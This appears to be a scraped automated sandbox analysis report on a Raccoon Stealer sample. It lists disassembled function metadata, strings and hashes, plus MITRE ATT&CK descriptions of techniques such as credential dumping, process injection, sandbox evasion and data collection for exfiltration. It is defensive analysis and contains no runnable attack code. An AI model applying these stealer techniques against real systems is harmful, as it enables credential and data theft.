GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042C0E2
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042C107

Strings

image/jpeg, xrefs: 0042C115

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersGdipImage$Size
String ID: image/jpeg
API String ID: 864223233-3785015651
Opcode ID: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction ID: 808b449813365729b0edeeee678a10cb9db49e559912ab6d87952b6290e95faf
Opcode Fuzzy Hash: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction Fuzzy Hash: 5111E732E00118EB8B109F999CC14AEBBB5FE45360B60016BF81073291C7755E559E98

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CC0D

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

, column , xrefs: 0041CC7C
at line , xrefs: 0041CC60

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: at line $, column
API String ID: 3708980276-191570568
Opcode ID: 12f39291e4d80daac8708076b24241cc6254ce90581f51bea7d3b8192ac938ef
Instruction ID: 09c8498a4e1e5b2bbd83ea2cce7dd7688a8647a19e90f87bfa3ac21dfedca142
Opcode Fuzzy Hash: 12f39291e4d80daac8708076b24241cc6254ce90581f51bea7d3b8192ac938ef
Instruction Fuzzy Hash: 68218171910118DBCB19EB91CC91AEDB779EF54304F40805FE416A3281EFB85E4ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 00454623, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0045AB16: MultiByteToWideChar.KERNEL32(00460412,00000100,E8458D00,00000000,00000000,00000020,?,0045D9C1,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0045AB86

Part of subcall function 0045850D: HeapAlloc.KERNEL32(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E

_free.LIBCMT ref: 0045467D

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

_free.LIBCMT ref: 00454693

Strings

`,i, xrefs: 00454628

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap_free$AllocByteCharErrorFreeLastMultiWide
String ID: `,i
API String ID: 2264667202-3133775968
Opcode ID: 86a5b5d3014b6f83f8f478eadf58d2213a864a731e26edcaedaf543a775db22f
Instruction ID: bc681d83d5f84e6f5bd839b78c896df346e13688c98fbd9687c1fe4080105e9a
Opcode Fuzzy Hash: 86a5b5d3014b6f83f8f478eadf58d2213a864a731e26edcaedaf543a775db22f
Instruction Fuzzy Hash: 3101ADA26052153AA21025BA5C81E27628CCE823BE724062BFD249A3C3EA9CDD5801AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9EC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041C9F1

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

6rkw, xrefs: 0041CA02, 0041CA75
[json.exception., xrefs: 0041CA18

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: 6rkw$[json.exception.
API String ID: 3708980276-421156741
Opcode ID: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
Instruction ID: c627d136464e43b18722d203518cf07b090df2e94217dcff2b1788000faf46b6
Opcode Fuzzy Hash: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
Instruction Fuzzy Hash: D0118671D10158DFCB05EBE5C891AEDBBB4EF55318F10806FE006A3282DBB89A85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042653C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426541

Strings

object != nullptr, xrefs: 0042658D
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426588

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
Instruction ID: 576cac20529d08dd017f4d20a09ad8b78334590e865ddf8fdf419cb452501d68
Opcode Fuzzy Hash: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
Instruction Fuzzy Hash: 92F0AF71E403149FD351DF689802749BBF4EF04B04F10806FE849EB341E6788A04CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004265A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004265AE

Strings

object != nullptr, xrefs: 004265E9
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004265E4

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: b64562c5e19d02db7d35b0ebb13aa8987d3aca05b761e89f3024fe9da3284801
Instruction ID: 6c344f967f61df9999932ce3ab7ba41ba1deb411c9b6cb5ba1a866f0604a8197
Opcode Fuzzy Hash: b64562c5e19d02db7d35b0ebb13aa8987d3aca05b761e89f3024fe9da3284801
Instruction Fuzzy Hash: 06F0A071E40224A7CB11ABA495027DEBBB4DB44B58F10816FE805A2282DAB80A4487DA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre